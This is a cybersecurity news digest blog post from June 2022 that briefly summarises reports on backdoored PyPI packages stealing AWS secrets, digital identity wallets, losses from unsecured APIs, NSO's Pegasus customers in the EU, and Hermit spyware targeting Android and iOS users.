AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 06/24/2022

Multiple Backdoored Python Libraries Caught Stealing AWS Secrets and Keys

Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint. The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages and as well as the endpoint have now been taken down. “Some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job,” Sharma said.


The future of personal identity

Imagine a day in the near future when you go to a bank to apply for a loan. Instead of providing a driver’s license, passport or birth certificate to verify your identity, and then filling out forms providing your date of birth, street address, email address, Social Security number and employment status, you simply tap your phone and display a QR code that the bank’s loan office scans to get all that information. That QR code will be generated by your digital wallet, an upgraded version of currently used smartphone payment apps such as Apple Wallet or Google Pay. The digital wallet will be able to electronically access your bank accounts and credit cards and also hold digital versions of government IDs, personal information about you and even tickets for plane flights and events.


Unsecured APIs Could Be Costing Firms $75bn Per Year

Global businesses could be exposing themselves to billions in annual losses because they aren’t properly securing their APIs, according to new research from Imperva. The security firm teamed up with the Marsh McLennan Cyber Risk Analytics Center to analyze nearly 117,000 unique cybersecurity incidents for their report, Quantifying the Cost of API Insecurity. It revealed that vulnerable and unsecured APIs cause an estimated 7.5% of cyber events and losses globally, rising to 18-23% in the IT and information sector. Professional services (10-15%) and retail (6-12%) rounded out the top three. APIs are an increasingly common feature of digital transformation projects – connecting applications, data and experiences. Imperva estimated that around half of businesses have 50-100 APIs deployed internally or publicly, although some have thousands.


NSO claims ‘more than 5’ EU states use Pegasus spyware

NSO Group told European lawmakers this week that “under 50” customers use its notorious Pegasus spyware, though these customers include “more than five” European Union member states. The surveillance-ware maker’s General Counsel Chaim Gelfand refused to answer specific questions about the company’s customers during a European Parliament committee meeting on Thursday. Instead, he frequently repeated the company line that NSO exclusively sells its spyware to government agencies — not private companies or individuals — and only “for the purpose of preventing and investigating terrorism and other serious crimes.”


Google Warns Spyware Being Deployed Against Android, iOS Users

Google is warning victims in Kazakhstan and Italy that they are being targeted by Hermit, a sophisticated and modular spyware from Italian vendor RCS Labs that not only can steal data but also record and make calls. Researchers from Google Threat Analysis Group (TAG) revealed details in a blog post Thursday by TAG researchers Benoit Sevens and Clement Lecigne about campaigns that send a unique link to targets to fake apps impersonating legitimate ones to try to get them to download and install the spyware. None of the fake apps were found on either Apple’s or Google’s respective mobile app stores, however, they said.

Related Posts